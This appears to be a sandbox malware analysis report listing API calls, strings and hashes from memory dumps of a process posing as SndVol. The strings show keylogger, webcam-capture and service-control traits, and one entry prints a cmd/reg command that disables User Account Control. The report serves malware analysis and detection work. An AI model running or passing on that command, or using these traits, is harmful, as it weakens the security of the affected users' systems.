                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __cftoe
                                                                        • String ID:
                                                                        • API String ID: 4189289331-0
                                                                        • Opcode ID: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                                        • Instruction ID: 3b27fdb4c35c25b1e4d31e3a3d26c66f2e408fa02a0c8e21196934905780c572
                                                                        • Opcode Fuzzy Hash: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                                                        • Instruction Fuzzy Hash: C451DB72900205ABEF249F6ADC40FAF77A9EF48365F15421FE817D6292DF31F9008666
                                                                        APIs
                                                                        • Sleep.KERNEL32(00001388), ref: 2913A77B
                                                                          • Part of subcall function 2913A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,2913A788), ref: 2913A6E6
                                                                          • Part of subcall function 2913A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,2913A788), ref: 2913A6F5
                                                                          • Part of subcall function 2913A6B0: Sleep.KERNEL32(00002710,?,?,?,2913A788), ref: 2913A722
                                                                          • Part of subcall function 2913A6B0: CloseHandle.KERNEL32(00000000,?,?,?,2913A788), ref: 2913A729
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 2913A7B7
                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 2913A7C8
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 2913A7DF
                                                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 2913A859
                                                                          • Part of subcall function 2914C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,2913A87E), ref: 2914C52F
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,29196478,?,00000000,00000000,00000000,00000000,00000000), ref: 2913A962
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                        • String ID:
                                                                        • API String ID: 3795512280-0
                                                                        • Opcode ID: 1fd75640cc282085b1b24b49bcdffd2f26483822a922c561e7ea9be7776b530c
                                                                        • Instruction ID: 72b79814d9e4473558a7472e3835653ab63619f0cd01720072b29836a95dff52
                                                                        • Opcode Fuzzy Hash: 1fd75640cc282085b1b24b49bcdffd2f26483822a922c561e7ea9be7776b530c
                                                                        • Instruction Fuzzy Hash: CA51B1317042447AEB49AB33CC54ABE77BE5FA025CFC0981CE552A71D0DF24AB0BC659
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16_free
                                                                        • String ID: a/p$am/pm
                                                                        • API String ID: 2936374016-3206640213
                                                                        • Opcode ID: 029a3155e5dd05cc7e0f65eb00bdd38d11446768a07c288e05d058078b7006d0
                                                                        • Instruction ID: 3917732c7cf2f3d127da283de7c307b1a227f73aa5676b2466a3eaacfb5db2a2
                                                                        • Opcode Fuzzy Hash: 029a3155e5dd05cc7e0f65eb00bdd38d11446768a07c288e05d058078b7006d0
                                                                        • Instruction Fuzzy Hash: 30D1F131D00307DAEB098F6AC895BFAB7B1FF05398F15455AE604AB251E3759B43CBA0
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29140EA9
                                                                        • int.LIBCPMT ref: 29140EBC
                                                                          • Part of subcall function 2913E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 2913E10D
                                                                          • Part of subcall function 2913E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 2913E127
                                                                        • std::_Facet_Register.LIBCPMT ref: 29140EFC
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 29140F05
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 29140F23
                                                                        • __Init_thread_footer.LIBCMT ref: 29140F64
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                        • String ID:
                                                                        • API String ID: 3815856325-0
                                                                        • Opcode ID: ed905251c66ac85a2a3fab8c5a21f49eca1b2fa579d3721b9043a746e68c4ca6
                                                                        • Instruction ID: f016c881ad6bbb03f942cac6b5ad8242bfe98fa91362be04a1d28b08afc115f3
                                                                        • Opcode Fuzzy Hash: ed905251c66ac85a2a3fab8c5a21f49eca1b2fa579d3721b9043a746e68c4ca6
                                                                        • Instruction Fuzzy Hash: 97210736E00514BBCB48DBABDC8189D37B99F18368B205156E505A7290DB319F13C7D0
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,2914A41F,00000000), ref: 2914AD19
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,2914A41F,00000000), ref: 2914AD2D
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,2914A41F,00000000), ref: 2914AD3A
                                                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,2914A41F,00000000), ref: 2914AD6F
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,2914A41F,00000000), ref: 2914AD81
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,2914A41F,00000000), ref: 2914AD84
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                        • String ID:
                                                                        • API String ID: 493672254-0
                                                                        • Opcode ID: ab09332f0c37b9662253d4f16b1e9677386bf0393105f201e47596987eaef794
                                                                        • Instruction ID: 395d98630bcc34f8501bd1fcf8a13ef96ae19ec4de8c6f9960fac2b514363a87
                                                                        • Opcode Fuzzy Hash: ab09332f0c37b9662253d4f16b1e9677386bf0393105f201e47596987eaef794
                                                                        • Instruction Fuzzy Hash: 7C016D71A551187AE7001A379C4EFBB3B6CEB0A375F014305F624961C0DA548F06B1A1
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000020,?,2916A875,?,?,?,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B), ref: 29178299
                                                                        • _free.LIBCMT ref: 291782CC
                                                                        • _free.LIBCMT ref: 291782F4
                                                                        • SetLastError.KERNEL32(00000000,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B,?,00000041,00000000,00000000), ref: 29178301
                                                                        • SetLastError.KERNEL32(00000000,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B,?,00000041,00000000,00000000), ref: 2917830D
                                                                        • _abort.LIBCMT ref: 29178313
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$_free$_abort
                                                                        • String ID:
                                                                        • API String ID: 3160817290-0
                                                                        • Opcode ID: c8249650f0699ecdfc73d006336e1618cb5b8bd37b1b957afa81fd8e43bd3fa1
                                                                        • Instruction ID: 129e48556b5411c6745fc30b04eb2af97da4cef8b619bc1651aefe3004dc1cd1
                                                                        • Opcode Fuzzy Hash: c8249650f0699ecdfc73d006336e1618cb5b8bd37b1b957afa81fd8e43bd3fa1
                                                                        • Instruction Fuzzy Hash: 30F0D6356007433AC345322BAC89EFA263A5BD13BDF214555F91892181EF24CB03C121
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,2914A6B4,00000000), ref: 2914AB46
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,2914A6B4,00000000), ref: 2914AB5A
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A6B4,00000000), ref: 2914AB67
                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,2914A6B4,00000000), ref: 2914AB76
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A6B4,00000000), ref: 2914AB88
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A6B4,00000000), ref: 2914AB8B
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                        • String ID:
                                                                        • API String ID: 221034970-0
                                                                        • Opcode ID: 9c74888c0457eb57aea36ac1eb38fd19ebaa1300705c85a4cb90a30c20541193
                                                                        • Instruction ID: f6bf960009870761054d35ce200e9a32c81f87960371eaf904c2880076917390
                                                                        • Opcode Fuzzy Hash: 9c74888c0457eb57aea36ac1eb38fd19ebaa1300705c85a4cb90a30c20541193
                                                                        • Instruction Fuzzy Hash: 14F0C271A1021C7BE7107A66DC4DDFB3B6CEB453A4F400056FD0986145EB289E06A5A5
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,2914A634,00000000), ref: 2914AC4A
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,2914A634,00000000), ref: 2914AC5E
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A634,00000000), ref: 2914AC6B
                                                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,2914A634,00000000), ref: 2914AC7A
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A634,00000000), ref: 2914AC8C
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A634,00000000), ref: 2914AC8F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                        • String ID:
                                                                        • API String ID: 221034970-0
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,2914A5B4,00000000), ref: 2914ACB1
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,2914A5B4,00000000), ref: 2914ACC5
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A5B4,00000000), ref: 2914ACD2
                                                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,2914A5B4,00000000), ref: 2914ACE1
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A5B4,00000000), ref: 2914ACF3
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,2914A5B4,00000000), ref: 2914ACF6
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                        • String ID:
                                                                        • API String ID: 221034970-0
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,2914A731,00000000), ref: 2914AAE4
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,2914A731,00000000), ref: 2914AAF9
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,2914A731,00000000), ref: 2914AB06
                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,2914A731,00000000), ref: 2914AB11
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,2914A731,00000000), ref: 2914AB23
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,2914A731,00000000), ref: 2914AB26
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                                                        • String ID:
                                                                        • API String ID: 276877138-0
                                                                        APIs
                                                                          • Part of subcall function 0445551E: __onexit.LIBCMT ref: 04455524
                                                                        • __Init_thread_footer.LIBCMT ref: 044225DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Init_thread_footer__onexit
                                                                        • String ID: PkG$XMG$NG$NG
                                                                        • API String ID: 1881088180-3151166067
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: PkGNG
                                                                        • API String ID: 0-263838557
                                                                        APIs
                                                                          • Part of subcall function 29143656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,291A50E4), ref: 29143678
                                                                          • Part of subcall function 29143656: RegQueryValueExW.ADVAPI32(?,2913F34E,00000000,00000000,?,00000400), ref: 29143697
                                                                          • Part of subcall function 29143656: RegCloseKey.ADVAPI32(?), ref: 291436A0
                                                                          • Part of subcall function 2914C048: GetCurrentProcess.KERNEL32(?,?,?,2913DAE5,WinDir,00000000,00000000), ref: 2914C059
                                                                        • _wcslen.LIBCMT ref: 2914B7F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                        • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                                                        • API String ID: 37874593-4246244872
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 2913B1AD
                                                                        • wsprintfW.USER32 ref: 2913B22E
                                                                          • Part of subcall function 2913A671: SetEvent.KERNEL32(?,?,00000000,2913B245,00000000), ref: 2913A69D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EventLocalTimewsprintf
                                                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                        • API String ID: 1497725170-248792730
                                                                        APIs
                                                                        • RegisterClassExA.USER32(00000030), ref: 2914D5EC
                                                                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 2914D607
                                                                        • GetLastError.KERNEL32 ref: 2914D611
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ClassCreateErrorLastRegisterWindow
                                                                        • String ID: 0$MsgWindowClass
                                                                        • API String ID: 2877667751-2410386613
                                                                        APIs
                                                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 291377D6
                                                                        • CloseHandle.KERNEL32(?), ref: 291377E5
                                                                        • CloseHandle.KERNEL32(?), ref: 291377EA
                                                                        Strings
                                                                        • C:\Windows\System32\cmd.exe, xrefs: 291377D1
                                                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 291377CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseHandle$CreateProcess
                                                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                        • API String ID: 2922976086-4183131282
                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,2917338B,?,?,2917332B,?), ref: 291733FA
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 2917340D
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,2917338B,?,?,2917332B,?), ref: 29173430
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        APIs
                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 29135120
                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,29134E7A,00000001), ref: 2913512C
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,29134E7A,00000001), ref: 29135137
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,29134E7A,00000001), ref: 29135140
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                        • String ID: KeepAlive | Disabled
                                                                        • API String ID: 2993684571-305739064
                                                                        APIs
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 2914AE83
                                                                        • PlaySoundW.WINMM(00000000,00000000), ref: 2914AE91
                                                                        • Sleep.KERNEL32(00002710), ref: 2914AE98
                                                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 2914AEA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                        • String ID: Alarm triggered
                                                                        • API String ID: 614609389-2816303416
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,2914CE7E), ref: 2914CDF3
                                                                        • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,2914CE7E), ref: 2914CE00
                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,2914CE7E), ref: 2914CE0D
                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,2914CE7E), ref: 2914CE20
                                                                        Strings
                                                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 2914CE13
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                        • API String ID: 3024135584-2418719853
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000,2913D29D), ref: 291344C4
                                                                          • Part of subcall function 29134607: __EH_prolog.LIBCMT ref: 2913460C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: H_prologSleep
                                                                        • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                        • API String ID: 3469354165-3547787478
                                                                        • Opcode ID: ed5b155f0d2c3adaf3a29566ee456105e7a3ff206ba4fbc1198de229a0427e8b
                                                                        • Instruction ID: c76cc097cd2a690facdb307b05282d60a228427941b78ad8c490290488b92c9a
                                                                        • Opcode Fuzzy Hash: ed5b155f0d2c3adaf3a29566ee456105e7a3ff206ba4fbc1198de229a0427e8b
                                                                        • Instruction Fuzzy Hash: 5751E231F0424077D759AB379C05A5D3BB6ABA5248FC09828E80957AD4DF249F0BC39A
                                                                        APIs
                                                                          • Part of subcall function 291761B8: HeapAlloc.KERNEL32(00000000,29165329,?,?,291688C7,?,?,00000000,?,?,2913DE9D,29165329,?,?,?,?), ref: 291761EA
                                                                        • _free.LIBCMT ref: 29174E87
                                                                        • _free.LIBCMT ref: 29174E9E
                                                                        • _free.LIBCMT ref: 29174EBD
                                                                        • _free.LIBCMT ref: 29174ED8
                                                                        • _free.LIBCMT ref: 29174EEF
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$AllocHeap
                                                                        • String ID:
                                                                        • API String ID: 1835388192-0
                                                                        • Opcode ID: 3d0f34dd53510f006e71da9f5086b28327a576b94d43b34223ea4359624b378b
                                                                        • Instruction ID: dfa75ee607ffa0438bacf223d29679e1fe38066df90732e02b3bb5373836736c
                                                                        • Opcode Fuzzy Hash: 3d0f34dd53510f006e71da9f5086b28327a576b94d43b34223ea4359624b378b
                                                                        • Instruction Fuzzy Hash: 7551B271E00706AFD714DF2ACD42AEA77F5EF54328B114569E909D7690EB35EB02CB80
                                                                        APIs
                                                                          • Part of subcall function 2914C048: GetCurrentProcess.KERNEL32(?,?,?,2913DAE5,WinDir,00000000,00000000), ref: 2914C059
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 2913F956
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 2913F97A
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 2913F989
                                                                        • CloseHandle.KERNEL32(00000000), ref: 2913FB40
                                                                          • Part of subcall function 2914C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,2913F634,00000000,?,?,291A5338), ref: 2914C08B
                                                                          • Part of subcall function 2914C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 2914C286
                                                                          • Part of subcall function 2914C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 2914C299
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 2913FB31
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 4269425633-0
                                                                        • Opcode ID: 1e33c2c679dd070d82e6d94378b948d32dc8f8ef43bb2b24aee4d2696cd36caa
                                                                        • Instruction ID: a217d807a6049bee57632462a5e29a868cdbdd104d1d2bb359c35c658b8f9d79
                                                                        • Opcode Fuzzy Hash: 1e33c2c679dd070d82e6d94378b948d32dc8f8ef43bb2b24aee4d2696cd36caa
                                                                        • Instruction Fuzzy Hash: 344116315042446BD3A9E723DC50AEFB7B9AFA4308F90992DD45E82194EF346B0FC756
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: aafc9addffebc021bd0c5a51e2926e398c0b0a72806720847fb103177b69969d
                                                                        • Instruction ID: 1bb12b7f1dc419eae62247b01cb7e5677c5530c43528b74b81afc3f21a38a937
                                                                        • Opcode Fuzzy Hash: aafc9addffebc021bd0c5a51e2926e398c0b0a72806720847fb103177b69969d
                                                                        • Instruction Fuzzy Hash: 7A410636E40305AFD714CF79CC85A89B7B5EF88358B1185A9E515EB381DB31AA03CB81
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __dosmaperr$_free
                                                                        • String ID:
                                                                        • API String ID: 242264518-0
                                                                        • Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                                        • Instruction ID: 25945dd218f04a2619cb2395b89a85d08b5ed9e892bd26b9c7e494eff44cabbd
